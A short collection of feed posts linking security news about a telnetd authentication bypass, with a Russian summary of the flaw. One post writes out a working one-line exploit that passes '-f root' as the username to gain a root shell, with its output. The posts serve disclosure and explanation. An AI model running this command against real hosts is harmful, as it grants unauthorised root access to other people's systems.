This Week In Security: Getting Back Up to Speed

https://fed.brid.gy/r/https://hackaday.com/2026/03/06/this-week-in-security-getting-back-up-to-speed/

https://blog.gslin.org/archives/2026/02/13/12889/telnetd-%e5%87%ba%e5%8c%85/

Telnetd 出包

#flaw #gnu #inetutils #login #network #root #security #telnet #telnetd #user

Warning: computer nerd stuff below:

So. In 2026, telnet is still a thing.
Really? 😑

ubuntu@ubuntu:~$ USER=“-f root” telnet -a victim.ip.address

[usual Ubuntu /etc/issue text]

root@ubuntu:~# id
uid=0(root) gid=0(root) groups=0(root)

You’re welcome.

#itsecurity #unix #linux #telnet #telnetd

Security Week 2605: тривиальная ошибка в telnetd

20 января разработчик Саймон Йозефссон опубликовал в рассылке oss-sec информацию о крайне серьезной уязвимости в демоне telnetd, реализующем удаленное подключение по протоколу telnet. В традиционной для описания уязвимости терминологии суть проблемы заключается в следующем: «ошибка в обработке входящих данных позволяет злоумышленнику пропустить процесс аутентификации и получить на подверженной уязвимости системе права суперпользователя». Применение таких терминов обычно обозначает, что подлинное описание проблемы либо слишком длинное, либо слишком сложное для понимания, но в данном случае это не так. При подключении к telnetd нужно указать имя пользователя. Его программа передает стандартной утилите login , причем передача осуществляется без предварительной проверки ввода от желающего подключиться. Если указать вместо имени пользователя строку «-f root», эти данные будут переданы в утилиту login, а она уже залогинит любого желающего под рутом без какой-либо авторизации, увидев соответствующий ключ -f. Собственно, это вся уязвимость как есть.

https://habr.com/ru/companies/kaspersky/articles/989152/

#иб #telnetd